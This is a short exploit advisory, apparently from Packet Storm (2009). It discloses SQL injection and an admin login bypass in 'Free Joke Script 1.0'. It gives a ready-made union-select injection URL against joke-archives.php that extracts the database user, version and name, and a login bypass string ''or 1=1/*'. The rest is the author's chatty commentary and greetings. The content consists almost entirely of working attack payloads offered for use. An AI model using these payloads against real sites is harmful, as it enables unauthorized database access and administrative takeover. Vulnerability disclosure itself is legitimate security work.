Free Joke Script 1.0 SQL Injection

2009-02-12T00:00:00
ID PACKETSTORM:74904
Type packetstorm
Reporter Muhacir
Modified 2009-02-12T00:00:00

Description

                                        
                                            `# freejokesscript = 1.0 (joke-archives.php) remote sql injection vulnerability & admin bypass vulnerability   
  
# info : found at semi sexy mode, when i was searching jokes script for my own site. if u have any please help :(. i didnt sit and search them like others so dont kick me hard :)  
  
# author : MuhaciR aka гламурный подонок  
  
# source : http://www.evernewscripts.com/?p=3  
  
# license price : $20 per copy  
  
# sql: http://www.victim.com/[jokes path if any]/joke-archives.php?cat_name=muhacir&cat_id=15+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*  
  
# admin bypas: simply enter 'or 1=1/* at login. no filtration  
  
# greetz goes :   
  
-me  
  
-my love, ok a little to turkmen girlz too :)  
  
-friends: arassa_turkmen, bezzat, mc_merw, baamcik, dmry ;)  
  
-and ofcourse str0ke for running this site  
  
P.S:i wholeheartedly celebrate your valentines day and wish you to love, be loved, success and ferrari  
  
  
`